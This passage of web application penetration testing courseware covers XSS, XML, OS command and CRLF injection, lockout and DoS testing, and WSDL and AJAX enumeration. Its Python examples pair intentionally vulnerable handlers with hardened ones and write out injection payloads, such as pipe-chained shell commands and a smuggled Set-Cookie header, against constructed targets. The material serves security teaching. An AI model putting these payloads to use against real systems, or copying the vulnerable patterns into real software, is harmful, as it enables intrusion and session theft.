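    """Run every vector through a resolver; return those that reach outside root."""
    escaped = []
    for vector in TRAVERSAL_VECTORS:
        try:
            resolved = resolver(root, vector)
        except ValueError:
            continue      # rejected by the resolver: the desired outcome
        if escapes_root(root, resolved):
            escaped.append(vector)
    return escaped


if __name__ == "__main__":
    print("vulnerable resolver lets through:", probe(vulnerable_resolve))
    print("hardened resolver lets through:", probe(safe_resolve))
```

A real handler should additionally resolve the final path with os.path.realpath, because this pure-path check cannot see a symbolic link under the root that points outside it.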


[Slide: Data Validation Testing]
• Test for reflected cross-site scripting: detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, WebScarab, XSS-Proxy, ratproxy, and Burp Proxy
• Test for stored cross-site scripting: analyze HTML code, test for stored XSS, leverage stored XSS, verify if the file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant
• Test for DOM-based cross-site scripting: perform source code analysis to identify JavaScript coding errors
• Test for cross site flashing: analyze SWF files using tools such as SWFIntruder, Decompiler - Flare, Compiler - MTASC, Disassembler - Flasm, Swfmill, and Debugger Version of Flash Plugin/Player
• Perform SQL injection testing: perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc.
• Perform LDAP injection testing: use a trial and error approach by inserting '(', '|', and the other characters in order to check the application for errors. Use the tool Softerra LDAP Browser
• Information these tests can expose: session cookie information, sensitive information such as session authorization tokens, cookie information, information on DOM-based cross-site scripting vulnerabilities, sensitive information about users and hosts, and database information

Data Validation Testing

Web applications must employ proper data validation methods. Otherwise, there may
be a chance for the attacker to break into the communication between the client and the
server, and inject malicious data. Hence, data validation pen testing must be conducted to
ensure that the current data validation methods or techniques employed by the web
application offer appropriate security. Follow the steps here to perform data validation testing:

Step 1: Test for reflected cross-site scripting

In a reflected cross-site scripting attack, the attacker crafts a URL that exploits the reflected XSS
vulnerability and sends it to the client in a spam mail. If the victim clicks on the link, considering it
as from a trusted server, the malicious script embedded by the attacker in the URL gets executed in
the victim's browser and sends the victim's session cookie to the attacker. Using this session
cookie, the attacker can steal the sensitive information of the victim. Hence, to avoid this kind
of attack you must check your web applications against reflected XSS attacks. If you put proper
data validation mechanisms or methods in place, then you can easily determine whether the
URL came originally from the server or was crafted by the attacker. Detect and analyze input
vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it.
Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, XSS
Assistant, and Burp Proxy.
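Step 1's "detect and analyze input vectors", as an added Python example (not from the courseware): a constructed search page reflects one parameter raw and encodes another, and a harmless probe marker shows which parameter is injectable; the hardened version encodes every reflected value with html.escape.

```python
"""Reflected XSS: finding the injectable input vector, and the encoded rendering that closes it (added example)."""
import html
from typing import Callable, Dict, List

Renderer = Callable[[Dict[str, str]], str]


def vulnerable_page(params: Dict[str, str]) -> str:
    """Constructed search page: 'lang' is encoded, 'q' is reflected raw into the HTML."""
    q = params.get("q", "")
    lang = html.escape(params.get("lang", "en"), quote=True)
    return f'<html lang="{lang}"><body><h1>Results for {q}</h1></body></html>'


def hardened_page(params: Dict[str, str]) -> str:
    """Same page with output encoding applied to every reflected value."""
    q = html.escape(params.get("q", ""), quote=True)
    lang = html.escape(params.get("lang", "en"), quote=True)
    return f'<html lang="{lang}"><body><h1>Results for {q}</h1></body></html>'


# Harmless marker containing every character that matters in HTML text or attributes.
MARKER = "zz<\"'>zz"


def find_injectable_params(render: Renderer, names: List[str], marker: str = MARKER) -> List[str]:
    """Submit the marker in each parameter in turn; a parameter is injectable
    when the marker comes back byte-for-byte, i.e. without encoding."""
    return [name for name in names if marker in render({name: marker})]


if __name__ == "__main__":
    print("vulnerable page, injectable:", find_injectable_params(vulnerable_page, ["q", "lang"]))
    print("hardened page, injectable:", find_injectable_params(hardened_page, ["q", "lang"]))
    print(hardened_page({"q": "<b>bold</b>"}))
```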


[Slide: Data Validation Testing (Cont'd)]
• Perform ORM injection testing: discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, NHibernate, and Ruby on Rails (reveals: information on SQL injection vulnerability)
• Perform XML injection testing: try to insert XML metacharacters (reveals: information about XML structure)
• Perform SSI injection testing: find out if the web server actually supports SSI directives using tools such as WebProxy Burp Suite, OWASP ZAP, WebScarab, and the string searcher grep (reveals: web server CGI environment variables)
• Perform XPath injection testing: inject XPath code and interfere with the query result (reveals: access to confidential information)
• Perform IMAP/SMTP injection testing: identify vulnerable parameters, understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection (reveals: access to the backend mail server)

Data Validation Testing (Cont'd)

Step 7: Perform ORM injection testing

Perform ORM injection testing to discover vulnerabilities in an ORM tool and to test web
applications that use ORM frameworks such as Hibernate, NHibernate, and Ruby on Rails
(ActiveRecord). An ORM layer still builds SQL from the input it is given, so this test gives
information on SQL injection vulnerabilities.

Step 8: Perform XML injection testing

To perform XML injection testing, try to insert XML metacharacters (for example ', ", <, >, &,
<!--, ]]> and <![CDATA[) and observe the response. A successful XML injection may give
information about the XML structure.

Step 9: Perform SSI injection testing

Perform SSI injection testing and find out whether the web server actually supports SSI
directives, using tools such as Burp Suite, Paros, WebScarab, and a string searcher (grep). If
the attacker can inject SSI directives, then he or she can set or print web server CGI
environment variables.

Step 10: Perform XPath injection testing

Inject XPath code and interfere with the query result. XPath injection allows the attacker to
access confidential information.
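The XML metacharacter probe from Step 8, carried through in Python as an added example (not code from the courseware): it shows which metacharacters break the server-side parser when input is concatenated into a document, what an injected closing tag does to such a document, and how the same input behaves once it is escaped. The registration document, the <role> element and the payload are constructed for the demonstration.

```python
"""XML injection (step 8): user input concatenated into an XML document
versus escaped first.

Added example, not from the courseware. The user record, the <role>
element and the payload are constructed for illustration.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Metacharacters a tester inserts first: a parser error (usually a 500)
# tells you there is XML in the backend and that input reaches it unescaped.
XML_METACHARACTERS = ["'", '"', "<", ">", "&", "<!--", "]]>", "<![CDATA["]


def build_user_vulnerable(username: str) -> str:
    # The request parameter is dropped straight into the markup.
    return f"<user><name>{username}</name><role>user</role></user>"


def build_user_hardened(username: str) -> str:
    # escape() turns <, > and & into entities; text content needs nothing else.
    return f"<user><name>{escape(username)}</name><role>user</role></user>"


def roles_seen(doc: str) -> list:
    """Parse the document and return the text of every <role> element,
    i.e. what the application would read back."""
    return [r.text for r in ET.fromstring(doc).iter("role")]


def parser_errors(builder) -> list:
    """Run each metacharacter through `builder`; return the ones that
    leave the document malformed."""
    broken = []
    for m in XML_METACHARACTERS:
        try:
            ET.fromstring(builder(m))
        except ET.ParseError:
            broken.append(m)
    return broken


# Closes <name>, injects a second <role>, and re-opens <name> so the
# resulting document still parses (a parser error would give the game away).
PAYLOAD = "alice</name><role>admin</role><name>"

if __name__ == "__main__":
    print(roles_seen(build_user_vulnerable(PAYLOAD)))   # ['admin', 'user']
    print(roles_seen(build_user_hardened(PAYLOAD)))     # ['user']
    print(parser_errors(build_user_vulnerable))         # includes '<' and '&'
    print(parser_errors(build_user_hardened))           # []
```

Two results matter to the tester: the list of metacharacters that produce parser errors (the information about XML structure the step refers to), and whether a well-formed payload can add elements the application trusts, as the injected second <role> does here.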


Data Validation Testing (Cont'd)

» Perform code injection testing: inject code (a malicious URL) and perform source code analysis
  to discover code injection vulnerabilities.
  Yields: input validation errors
» Perform OS commanding: perform manual code analysis and craft malicious HTTP requests using
  the pipe character (|) to test for OS command injection attacks.
  Yields: local data and system information
» Perform buffer overflow testing: perform manual and automated code analysis using tools such as
  OllyDbg to detect buffer overflow conditions.
  Yields: stack and heap memory information, application control flow
» Perform incubated vulnerability testing: upload a file that exploits a component in the local
  user workstation when viewed or downloaded by the user; perform XSS and SQL injection attacks.
  Yields: server configuration and input validation schemes
» Test for HTTP splitting/smuggling: identify all user-controlled input that influences one or
  more headers in the response, and check whether you can successfully inject a CR+LF sequence
  into it.
  Yields: cookies and HTTP redirect information

Data Validation Testing (Cont'd)

Step 12: Perform code injection testing

To perform code injection testing, inject code (a malicious URL) and perform source code
analysis to discover code injection vulnerabilities. This test gives information about input
validation errors.

Step 13: Perform OS commanding

Perform manual code analysis and craft malicious HTTP requests using the pipe character (|) to
test for OS command injection attacks. OS commanding may reveal local data and system
information.
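An added example (not from the courseware) of the pipe test from Step 13, run against two versions of the same "resolve a host" feature: one built on a shell command string, one on an argument list with an allow-list. echo stands in for the real command so the script runs on any system with a POSIX sh; the INJECTED marker and the payload list are constructed.

```python
"""OS command injection (step 13): the same feature built on a shell
string versus on an argument list with input validation.

Added example, not from the courseware. `echo` stands in for the real
command (nslookup, ping, ...); the INJECTED marker is constructed.
"""
import re
import subprocess

# RFC 1123-style hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def resolve_vulnerable(host: str) -> str:
    # The request parameter is pasted into a command line, so shell
    # metacharacters in `host` (| ; && $( )) are interpreted by /bin/sh.
    out = subprocess.run("echo resolving " + host, shell=True,
                         capture_output=True, text=True)
    return out.stdout


def resolve_hardened(host: str) -> str:
    # Allow-list the value, then pass it as its own argv element, no shell.
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname")
    out = subprocess.run(["echo", "resolving", host],
                         capture_output=True, text=True)
    return out.stdout


# Payloads a tester sends in the request; `|` is the one the slide names.
PAYLOADS = [
    "example.com | echo INJECTED",
    "example.com; echo INJECTED",
    "example.com && echo INJECTED",
    "$(echo INJECTED)",
]


def injected(handler, payload: str) -> bool:
    """True if output from the smuggled command shows up in the response."""
    try:
        return "INJECTED" in handler(payload)
    except ValueError:
        return False


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:32} vulnerable={injected(resolve_vulnerable, p)} "
              f"hardened={injected(resolve_hardened, p)}")
```

In a black-box test the marker is something observable from outside, such as a sleep, a DNS lookup to a host you control, or a string that is unlikely to occur in normal output; the logic of "does my command's side effect appear" is the same.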

Step 14: Perform buffer overflow testing

Perform manual and automated code analysis using tools such as OllyDbg to detect buffer
overflow conditions. This may help you to determine stack and heap memory information and
application control flow.

Step 15: Perform incubated vulnerability testing

Upload a file that exploits a component in the local user workstation when it is viewed or
downloaded by the user, and perform XSS and SQL injection attacks through such stored payloads.
Incubated vulnerabilities may give information about server configuration and input validation
schemes to the attackers.
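The CR+LF test from the slide, as an added example that is not part of the courseware: a redirect whose Location header is built from a request parameter, a small header parser that shows the extra Set-Cookie header the injection smuggles in, and a hardened builder that rejects it. The /login target, the cookie name and the response-building helper are constructed; a tester sends the payload percent-encoded as %0d%0a in the URL.

```python
"""HTTP response splitting: a redirect whose Location header comes from
a request parameter, before and after the CR/LF check.

Added example, not from the courseware. The /login path, the cookie
name and the response builder are constructed stand-ins.
"""


def _response(location: str) -> bytes:
    # Stand-in for the framework writing a 302 with the given Location.
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def redirect_vulnerable(next_url: str) -> bytes:
    # The decoded parameter is written straight into the header line.
    return _response(next_url)


def redirect_hardened(next_url: str) -> bytes:
    # Reject CR/LF outright, and only allow a local path (this also closes
    # the open-redirect variant such as "//evil.example").
    if "\r" in next_url or "\n" in next_url:
        raise ValueError("CR/LF in redirect target")
    if not next_url.startswith("/") or next_url.startswith("//"):
        raise ValueError("redirect target must be a local path")
    return _response(next_url)


def parse_headers(raw: bytes) -> dict:
    """Header lines of the first response, as a dict (status line dropped)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return dict(line.split(": ", 1)
                for line in head.split("\r\n")[1:] if ": " in line)


# What the server sees after decoding ...?next=/login%0d%0aSet-Cookie:%20session=attacker
PAYLOAD = "/login\r\nSet-Cookie: session=attacker"

if __name__ == "__main__":
    print(parse_headers(redirect_vulnerable(PAYLOAD)))   # contains Set-Cookie
    try:
        redirect_hardened(PAYLOAD)
    except ValueError as e:
        print("hardened:", e)
```

The same CR+LF check applies to every header that user input can influence, not only Location; Set-Cookie built from a parameter is the other common case, which is why the slide lists cookies and redirect information as the information this test yields.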


Denial-of-Service Testing

» Test for SQL wildcard attacks: craft a query that will not return a result and includes several
  wildcards. Test manually or employ a fuzzer to automate the process.
  Yields: application information
» Test for locking customer accounts: test that an account does indeed lock after a certain number
  of failed logins. Find places where the application discloses the difference between valid and
  invalid logins.
  Yields: login account information
» Test for buffer overflows: perform a manual source code analysis and submit a range of inputs
  with varying lengths to the application.
  Yields: buffer overflow points
» Test for user-specified object allocation: find where the numbers submitted as a name/value pair
  might be used by the application code and attempt to set the value to an extremely large
  numeric value, then see if the server continues to respond.
  Yields: maximum number of objects that the application can handle


Denial-of-Service Testing

To check your web application against DoS attacks, follow these steps:

Step 1: Test for SQL wildcard attacks

Craft a query that will not return a result and includes several wildcards. Test manually or
employ a fuzzer to automate the process.

Step 2: Test for locking customer accounts

Test that an account does indeed lock after a certain number of failed logins. Find places where
the application discloses the difference between valid and invalid logins. If your web
application doesn't lock customer accounts after a certain number of failed logins, then there
is a possibility for the attacker to crack customer passwords by employing brute force attacks,
dictionary attacks, etc.
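A harness for Step 2, added here as an example and not taken from the courseware: it submits wrong passwords until the account stops answering "bad password", then tries the real one, and separately checks whether the error text differs between an existing and a non-existent username (the disclosure the step asks you to look for). FakeLoginService, its threshold and the usernames are constructed stand-ins; against a real target, attempt() becomes an HTTP POST to the login form returning (status_code, body).

```python
"""Account-lockout and login-oracle test (DoS testing, step 2).

Added example, not from the courseware. FakeLoginService is a constructed
stand-in for the target; replace attempt() with a real HTTP POST that
returns (status_code, response_body).
"""
from dataclasses import dataclass, field


@dataclass
class FakeLoginService:
    users: dict                       # username -> password (constructed)
    lockout_threshold: int = 5
    failures: dict = field(default_factory=dict)

    def attempt(self, user: str, password: str):
        """Behave like a login endpoint: return (status, message)."""
        if user not in self.users:
            return 401, "unknown user"        # differs from "bad password": enumerable
        if self.failures.get(user, 0) >= self.lockout_threshold:
            return 423, "account locked"
        if self.users[user] == password:
            self.failures[user] = 0
            return 200, "welcome"
        self.failures[user] = self.failures.get(user, 0) + 1
        return 401, "bad password"


def check_lockout(attempt, user: str, good_pw: str, bad_pw: str,
                  max_tries: int = 20) -> dict:
    """Send bad passwords until the service stops answering 401, then try
    the genuine password. locked_at is the attempt number that first got
    a non-401 answer (None if the account never locked); valid_login_after
    tells you whether the real credential still works afterwards."""
    locked_at = None
    for i in range(1, max_tries + 1):
        status, _ = attempt(user, bad_pw)
        if status != 401:
            locked_at = i
            break
    status, _ = attempt(user, good_pw)
    return {"locked_at": locked_at, "valid_login_after": status == 200}


def check_user_enumeration(attempt, real_user: str, fake_user: str,
                           bad_pw: str) -> bool:
    """True if a wrong password gets a different answer for a real user
    than for a non-existent one, i.e. the app discloses valid usernames."""
    return attempt(real_user, bad_pw) != attempt(fake_user, bad_pw)


if __name__ == "__main__":
    svc = FakeLoginService(users={"alice": "s3cret"})
    print("enumerable:", check_user_enumeration(svc.attempt, "alice", "nobody", "x"))
    svc = FakeLoginService(users={"alice": "s3cret"})
    print("lockout:", check_lockout(svc.attempt, "alice", "s3cret", "x"))
```

Note the two findings pull in opposite directions: no lockout means the password can be brute-forced (the step's point), while a lockout that an unauthenticated caller can trigger at will is itself the denial-of-service condition this section is about, so report both the threshold and how it is keyed (per account, per source IP, or both).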

Step 3: Test for buffer overflows

Perform a manual source code analysis and submit a range of inputs with varying lengths to the
application to test for buffer overflows.

Step 4: Test for user-specified object allocation

Find where the numbers submitted as a name/value pair might be used by the application code
and attempt to set the value to an extremely large numeric value, and then see if the server
continues to respond.


Denial-of-Service Testing (Cont'd)

» Test for user input as a loop counter: enter an extremely large number in the input field that
  is used by the application as a loop counter.
  Yields: logical errors in the application
» Write user-provided data to disk: use a script to automatically submit an extremely long value
  to the server in the request that is being logged.
  Yields: local disk exhaustion
» Test for proper release of resources: identify and send a large number of requests that perform
  database operations and observe any slowdown or new error messages.
  Yields: programming flaws
» Test for storing too much data in session: create a script to automate the creation of many new
  sessions with the server and run the request that is suspected of caching the data within the
  session for each one.
  Yields: session management errors

Denial-of-Service Testing (Cont'd)

Step 5: Test for user input as a loop counter

Test for user input as a loop counter by entering an extremely large number in the input field
that is used by the application as a loop counter. If the application fails to behave in its
predefined manner, the application contains a logical error.

Step 6: Write user-provided data to disk

Use a script to automatically submit an extremely long value to the server in the request that
is being logged, and watch for local disk exhaustion.

Step 7: Test for proper release of resources

Identify and send a large number of requests that perform database operations and observe any
slowdown or new error messages.

Step 8: Test for storing too much data in session

Create a script to automate the creation of many new sessions with the server and run the
request that is suspected of caching the data within the session for each one.


Web Services Testing

» To gather WS information, use tools such as wsChess, SOAP::Lite, curl, Perl, etc. and online
  tools such as UDDI Browser, WSIndex, and XMethods
» Use tools such as Foundstone WSDigger and WebScarab to automate web services security testing
» Pass malformed SOAP messages to the XML parser or attach a very large string to the message.
  Use WSDigger to perform automated XML structure testing
» Use web application vulnerability scanners such as WebScarab to test XML content-level
  vulnerabilities
  Yields: information about SQL, XPath, buffer overflow, and command injection vulnerabilities
» Pass malicious content in the HTTP GET strings that invoke XML applications
  Yields: HTTP GET/REST attack vectors
» Craft an XML document (SOAP message) to send to a web service that contains malware as an
  attachment, to check whether the XML document has a SOAP attachment vulnerability
  Yields: SOAP message information
» Attempt to resend a sniffed XML message using Wireshark and WebScarab
  Yields: information about MITM vulnerability

Web Services Testing

Step 1: Gather WS information

Gather WS information using tools such as Net-Square wsChess, SOAP::Lite, curl, Perl, etc. and
online tools such as UDDI Browser, WSIndex, and XMethods.

Step 2: Test WSDL

Test the WSDL to determine the various entry points (service endpoints and operations) it
exposes. You can automate web services security testing using tools such as Foundstone
WSDigger and WebScarab.

Step 3: Test XML structure

Pass malformed SOAP messages to the XML parser or attach a very large string to the message.
Use WSDigger to perform automated XML structure testing.

Step 4: Test XML content level

Use web application vulnerability scanners such as WebScarab to test for XML content-level
vulnerabilities.

Step 5: Test HTTP GET parameters/REST

Pass malicious content in the HTTP GET strings that invoke XML applications.
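Steps 2 and 3 in code, as an added example that is not part of the courseware: a parser that pulls the endpoint address and the operations (with their SOAPAction values) out of a WSDL, and builders for the two probe messages the slide describes, a structurally broken envelope and one carrying a very large string. The WSDL document, service name, namespace and URL are constructed.

```python
"""Web services testing, steps 2 and 3: enumerate WSDL entry points and
build the malformed / oversized SOAP requests used for structure testing.

Added example, not from the courseware. SAMPLE_WSDL is a constructed
minimal WSDL 1.1 document; the service, namespace and URL are made up.
"""
import xml.etree.ElementTree as ET

NS = {
    "wsdl": "http://schemas.xmlsoap.org/wsdl/",
    "soap": "http://schemas.xmlsoap.org/wsdl/soap/",
}

SAMPLE_WSDL = """<definitions name="AcctService"
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:tns="http://example.test/acct"
    targetNamespace="http://example.test/acct">
  <portType name="AcctPort">
    <operation name="GetBalance"><input message="tns:GetBalanceIn"/></operation>
    <operation name="Transfer"><input message="tns:TransferIn"/></operation>
  </portType>
  <binding name="AcctBinding" type="tns:AcctPort">
    <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="GetBalance"><soap:operation soapAction="urn:GetBalance"/></operation>
    <operation name="Transfer"><soap:operation soapAction="urn:Transfer"/></operation>
  </binding>
  <service name="AcctService">
    <port name="AcctPort" binding="tns:AcctBinding">
      <soap:address location="http://example.test/acct"/>
    </port>
  </service>
</definitions>"""


def wsdl_entry_points(wsdl_text: str) -> dict:
    """Return {'endpoints': [urls], 'operations': {name: soapAction}}."""
    root = ET.fromstring(wsdl_text)
    endpoints = [a.get("location") for a in root.iterfind(".//soap:address", NS)]
    ops = {}
    for op in root.iterfind(".//wsdl:binding/wsdl:operation", NS):
        sa = op.find("soap:operation", NS)
        ops[op.get("name")] = sa.get("soapAction") if sa is not None else None
    return {"endpoints": endpoints, "operations": ops}


def soap_envelope(operation: str, ns: str, params: dict) -> str:
    """A minimal document-style SOAP 1.1 request for `operation`."""
    body = "".join(f"<{k}>{v}</{k}>" for k, v in params.items())
    return ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            f'<soapenv:Body><{operation} xmlns="{ns}">{body}</{operation}></soapenv:Body>'
            '</soapenv:Envelope>')


def malformed_envelope(operation: str, ns: str) -> str:
    """Structural probe: drop the closing Body tag so the parser must fail."""
    return soap_envelope(operation, ns, {"acct": "1"}).replace("</soapenv:Body>", "", 1)


def oversized_envelope(operation: str, ns: str, size: int = 1_000_000) -> str:
    """Large-string probe: one parameter carrying `size` bytes of payload."""
    return soap_envelope(operation, ns, {"acct": "A" * size})


def is_well_formed(xml_text: str) -> bool:
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    info = wsdl_entry_points(SAMPLE_WSDL)
    print(info)
    ns = "http://example.test/acct"
    print("malformed parses:", is_well_formed(malformed_envelope("GetBalance", ns)))
    print("oversized bytes:", len(oversized_envelope("GetBalance", ns)))
```

Each probe goes to every endpoint with the matching SOAPAction header; what you record is whether the service answers with a clean SOAP Fault, a stack trace, a timeout, or nothing at all, since a verbose fault is the information leak and a timeout on the oversized message is the denial-of-service finding.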


AJAX Testing

» Test for AJAX: enumerate the AJAX call endpoints for the asynchronous calls using tools such as
  Sprajax.
  Yields: AJAX application call endpoints
» Parse the HTML and JavaScript files: observe HTML and JavaScript files to find URLs of additional
  application surface exposure.
  Yields: XMLHttpRequest objects, JavaScript files, AJAX frameworks
» Use a proxy to observe traffic: use proxies and sniffers to observe traffic generated by
  user-viewable pages and the background asynchronous traffic to the AJAX endpoints, in order to
  determine the format and destination of the requests.
  Yields: format of application requests

AJAX Testing

The following are the steps used to carry out AJAX pen testing:

Step 1: Test for AJAX

Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.

Step 2: Parse the HTML and JavaScript files

Observe HTML and JavaScript files to find URLs of additional application surface exposure.

Step 3: Use a proxy to observe traffic

Use proxies and sniffers to observe traffic generated by user-viewable pages and the background
asynchronous traffic to the AJAX endpoints, in order to determine the format and destination of
the requests.
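Step 2 as an added example (not from the courseware): a set of regular expressions that pull endpoint URLs out of HTML and JavaScript for the common XMLHttpRequest, fetch(), jQuery and axios call shapes, resolved against the page's base URL. The HTML and JavaScript fragments, the base URL and the paths are constructed.

```python
"""AJAX testing, step 2: harvest endpoint URLs from HTML and JavaScript
so the asynchronous call surface can be listed before proxying it.

Added example, not from the courseware. The page fragment, script and
base URL are constructed; the patterns cover XMLHttpRequest.open,
fetch(), jQuery $.ajax/$.get/$.post, axios and <script src=...>.
"""
import re
from urllib.parse import urljoin

# Constructed page fragment and script, as a crawler would fetch them.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/api/v1/orders", true);
</script></head><body><div id="cart"></div></body></html>"""

SAMPLE_JS = """
fetch('/api/v1/profile', {credentials: 'include'}).then(r => r.json());
$.ajax({url: "/api/v1/search?q=" + term, type: "GET"});
$.post("/api/v1/comments", {text: t});
axios.get(`/api/v1/users/${id}`);
"""

# In every pattern the last capturing group is the URL.
PATTERNS = [
    re.compile(r"""\.open\(\s*["'](GET|POST|PUT|DELETE|PATCH)["']\s*,\s*["'`]([^"'`]+)["'`]"""),
    re.compile(r"""fetch\(\s*["'`]([^"'`]+)["'`]"""),
    re.compile(r"""\$\.(?:ajax\(\s*\{[^}]*?url\s*:\s*|get\(\s*|post\(\s*)["'`]([^"'`]+)["'`]"""),
    re.compile(r"""axios\.(get|post|put|delete|patch)\(\s*["'`]([^"'`]+)["'`]"""),
    re.compile(r"""<script[^>]+src=["']([^"']+)["']"""),
]


def extract_endpoints(text: str, base: str = "http://example.test/") -> set:
    """Absolute URLs found by any pattern. Template placeholders such as
    ${id} are kept so the tester can see where a parameter goes."""
    found = set()
    for pat in PATTERNS:
        for m in pat.finditer(text):
            found.add(urljoin(base, m.group(m.lastindex)))
    return found


if __name__ == "__main__":
    for url in sorted(extract_endpoints(SAMPLE_HTML) | extract_endpoints(SAMPLE_JS)):
        print(url)
```

Script URLs found in the HTML are fetched and fed back through extract_endpoints, since the bulk of the call surface usually lives in the bundled JavaScript rather than in the page itself; URLs built at runtime from variables (the search?q= + term case) show up truncated and are completed by watching the proxy in Step 3.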



Module Summary

» Organizations today rely heavily on web applications and Web 2.0 technologies to support key
  business processes and improve performance.
» With increasing dependence, web applications and web services are increasingly being targeted
  by various attacks that result in huge revenue loss for organizations.
» Some of the major web application vulnerabilities include injection flaws, cross-site scripting
  (XSS), SQL injection, security misconfiguration, broken session management, etc.
» Input validation flaws are a major concern, as attackers can exploit these flaws to perform, or
  create a base for, most web application attacks, including cross-site scripting, buffer
  overflow, injection attacks, etc.
» It is also observed that most vulnerabilities result from misconfiguration and from not
  following standard security practices.
» Common countermeasures for web application security include secure application development,
  input validation, creating and following security best practices, using a WAF and firewall/IDS,
  and performing regular auditing of the network using web application security tools.
